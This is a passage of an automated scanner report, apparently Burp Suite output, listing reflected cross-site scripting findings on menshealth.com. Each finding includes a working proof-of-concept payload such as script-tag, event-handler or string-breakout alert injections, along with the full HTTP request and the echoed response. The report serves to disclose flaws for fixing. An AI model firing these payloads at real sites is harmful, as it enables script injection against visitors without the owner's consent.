<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/menshealth4bfdb';alert(1)//57bc71cf34c/experts;'+rasegs+';topic=' + topic + ';sbtpc=;cat=;kw=experts;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.49. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertlandingpage.do

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540e5"><script>alert(1)</script>6cfa3a3c4c3 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertlandingpage.do?site=MensHealth540e5"><script>alert(1)</script>6cfa3a3c4c3&cm_re=HP-_-Footer-_-Experts HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89493

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth540e5"><script>alert(1)</script>6cfa3a3c4c3/experts;'+rasegs+';topic=home;sbtpc=;cat=;kw=experts;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.50. http://www.menshealth.com/cda/expertoverview.do [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertoverview.do

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afef"><script>alert(1)</script>8a0c6647d68 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertoverview.do?site=MensHealth4afef"><script>alert(1)</script>8a0c6647d68&channel=experts&expertId=1c74f5b65fa53010VgnVCM100000cfe793cd____ HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100174

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth4afef"><script>alert(1)</script>8a0c6647d68/guywisdom;'+rasegs+';topic=home;sbtpc=;cat=;kw=experts;kw=menshealth;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.51. http://www.menshealth.com/cda/expertoverview.do [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertoverview.do

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a4dd'%3balert(1)//e391d25fef was submitted in the site parameter. This input was echoed as 3a4dd';alert(1)//e391d25fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertoverview.do?site=MensHealth3a4dd'%3balert(1)//e391d25fef&channel=experts&expertId=1c74f5b65fa53010VgnVCM100000cfe793cd____ HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97896

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/menshealth3a4dd';alert(1)//e391d25fef/guywisdom;'+rasegs+';topic=' + topic + ';sbtpc=;cat=;kw=experts;kw=menshealth;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.52. http://www.menshealth.com/cda/featured_video.do [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/featured_video.do

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6a39'%3balert(1)//aadf88daed5 was submitted in the site parameter. This input was echoed as d6a39';alert(1)//aadf88daed5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/featured_video.do?site=MensHealthd6a39'%3balert(1)//aadf88daed5&channel=video HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:43 GMT
Content-Length: 23266
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache key -->


<!-- Toggle print mode
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/menshealthd6a39';alert(1)//aadf88daed5/video;'+rasegs+';topic=' + topic + ';sbtpc=home;cat=;kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.53. http://www.menshealth.com/cda/featured_video.do [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/featured_video.do

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ca72"><script>alert(1)</script>a3f226141f1 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/featured_video.do?site=MensHealth9ca72"><script>alert(1)</script>a3f226141f1&channel=video HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:43 GMT
Content-Length: 23484
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache key -->


<!-- Toggle print mode
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth9ca72"><script>alert(1)</script>a3f226141f1/video;'+rasegs+';topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.54. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/toolsandquizzes_index.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56870"%3balert(1)//5a12c3692f5 was submitted in the category parameter. This input was echoed as 56870";alert(1)//5a12c3692f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolsandquizzes_index.do?channel=customerservice&category=toolsquizzes56870"%3balert(1)//5a12c3692f5&topic=toollist HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124855

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<!-- Get URL attribute for cac
...[SNIP]...
<!-- hide from non-JavaScript browsers
                   var ord=Math.random()*10000000000000000;
                   var tile= 1;
                   var num = ord + "?";                    
                   
                                       
                                           var topic= "toolsquizzes56870";alert(1)//5a12c3692f5";
                   
                   
                                                               var sbtpc= "toollist";
                   
               // end hide from browsers -->
...[SNIP]...

2.55. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/toolsandquizzes_index.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb78"><script>alert(1)</script>4c3050c065a was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolsandquizzes_index.do?channel=customerservice&category=toolsquizzes8bb78"><script>alert(1)</script>4c3050c065a&topic=toollist HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:47:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101160

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<!-- Get URL attribute for cac
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth/customerservice;'+rasegs+';topic=toolsquizzes8bb78"><script>alert(1)</script>4c3050c065a;sbtpc=toollist;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.56. http://www.menshealth.com/cda/toolsandquizzes_index.do [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/toolsandquizzes_index.do

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abf0"%3balert(1)//c98f1481 was submitted in the topic parameter. This input was echoed as 2abf0";alert(1)//c98f1481 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolsandquizzes_index.do?channel=customerservice&category=toolsquizzes&topic=toollist2abf0"%3balert(1)//c98f1481 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<!-- Get URL attribute for cac
...[SNIP]...
d=Math.random()*10000000000000000;
                   var tile= 1;
                   var num = ord + "?";                    
                   
                                       
                                           var topic= "toolsquizzes";
                   
                   
                                                               var sbtpc= "toollist2abf0";alert(1)//c98f1481";
                   
               // end hide from browsers -->
...[SNIP]...

2.57. http://www.menshealth.com/downloads/all/ [cm_sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The value of the cm_sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26d"><script>alert(1)</script>93c4e0a1d98 was submitted in the cm_sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?download_type=iPhone%20App&cm_sp=apple-_-MHWorkouts-_-downloadcenter7e26d"><script>alert(1)</script>93c4e0a1d98 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=2oqvi6274e7lprjf428ai2jdr1; path=/
Content-Length: 56773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/all/?download_type=iPhone%20App&cm_sp=apple-_-MHWorkouts-_-downloadcenter7e26d"><script>alert(1)</script>93c4e0a1d98">
...[SNIP]...

2.58. http://www.menshealth.com/downloads/all/ [download_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The value of the download_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72bcf"><script>alert(1)</script>66fdd6e76a1 was submitted in the download_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?download_type=iPhone%20App72bcf"><script>alert(1)</script>66fdd6e76a1&cm_sp=apple-_-MHWorkouts-_-downloadcenter HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=n78bqspif5ahsq5qf2uoi2dvl4; path=/
Content-Length: 45768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/all/?download_type=iPhone%20App72bcf"><script>alert(1)</script>66fdd6e76a1&cm_sp=apple-_-MHWorkouts-_-downloadcenter">
...[SNIP]...

2.59. http://www.menshealth.com/downloads/all/ [download_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The value of the download_type request parameter is copied into the HTML document as plain text between tags. The payload fbea4<script>alert(1)</script>e1489106aca was submitted in the download_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?download_type=iPhone%20Appfbea4<script>alert(1)</script>e1489106aca&cm_sp=apple-_-MHWorkouts-_-downloadcenter HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=nud9q64h4if55c09a5esja6rf7; path=/
Set-Cookie: BIGipServermh-mini=1260366016.20480.0000; path=/
Content-Length: 45764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<h4>All iPhone Appfbea4<script>alert(1)</script>e1489106aca Downloads</h4>
...[SNIP]...

2.60. http://www.menshealth.com/downloads/all/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d84b0"><script>alert(1)</script>35d715869da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?d84b0"><script>alert(1)</script>35d715869da=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=qu1fr7ptjthg34l1gat4vu1216; path=/
Content-Length: 134245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/all/?d84b0"><script>alert(1)</script>35d715869da=1">
...[SNIP]...

2.61. http://www.menshealth.com/downloads/fitness/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/fitness/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20114"><script>alert(1)</script>a12626cc2b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/fitness/?20114"><script>alert(1)</script>a12626cc2b3=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=um8utgig0dhsp2d8at1etrlad2; path=/
Content-Length: 106686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/fitness/?20114"><script>alert(1)</script>a12626cc2b3=1">
...[SNIP]...

2.62. http://www.menshealth.com/downloads/sex-and-relationships/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/sex-and-relationships/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437c3"><script>alert(1)</script>bf08695ca35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/sex-and-relationships/?437c3"><script>alert(1)</script>bf08695ca35=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=pcob4b8h4v0l4v5inm191a17u5; path=/
Content-Length: 58754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/sex-and-relationships/?437c3"><script>alert(1)</script>bf08695ca35=1">
...[SNIP]...

2.63. http://www.menshealth.com/fitness/cardio-activities/recent-10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/cardio-activities/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1754e"><img%20src%3da%20onerror%3dalert(1)>37d9ff07923 was submitted in the REST URL parameter 2. This input was echoed as 1754e"><img src=a onerror=alert(1)>37d9ff07923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/cardio-activities1754e"><img%20src%3da%20onerror%3dalert(1)>37d9ff07923/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:38:34 +0000
ETag: "1299775114-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:18 GMT
Date: Thu, 10 Mar 2011 16:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/cardio-activities1754e"><img src=a onerror=alert(1)>37d9ff07923/recent-10">
...[SNIP]...

2.64. http://www.menshealth.com/fitness/getting-started/recent-10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/getting-started/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a81"><img%20src%3da%20onerror%3dalert(1)>4f62b773f7c was submitted in the REST URL parameter 2. This input was echoed as 44a81"><img src=a onerror=alert(1)>4f62b773f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/getting-started44a81"><img%20src%3da%20onerror%3dalert(1)>4f62b773f7c/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:48:19 +0000
ETag: "1299775699-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:26 GMT
Date: Thu, 10 Mar 2011 16:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/getting-started44a81"><img src=a onerror=alert(1)>4f62b773f7c/recent-10">
...[SNIP]...

2.65. http://www.menshealth.com/fitness/muscle-building/recent-10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/muscle-building/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24b67"><img%20src%3da%20onerror%3dalert(1)>b326d4dec92 was submitted in the REST URL parameter 2. This input was echoed as 24b67"><img src=a onerror=alert(1)>b326d4dec92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/muscle-building24b67"><img%20src%3da%20onerror%3dalert(1)>b326d4dec92/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:48:04 +0000
ETag: "1299775684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:07 GMT
Date: Thu, 10 Mar 2011 16:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/muscle-building24b67"><img src=a onerror=alert(1)>b326d4dec92/recent-10">
...[SNIP]...

2.66. http://www.menshealth.com/fitness/sports-injuries/recent-10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/sports-injuries/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e37b4"><img%20src%3da%20onerror%3dalert(1)>e635af9fc62 was submitted in the REST URL parameter 2. This input was echoed as e37b4"><img src=a onerror=alert(1)>e635af9fc62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/sports-injuriese37b4"><img%20src%3da%20onerror%3dalert(1)>e635af9fc62/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:48:09 +0000
ETag: "1299775689-1"
Content-Type: text/html; charset=utf-8
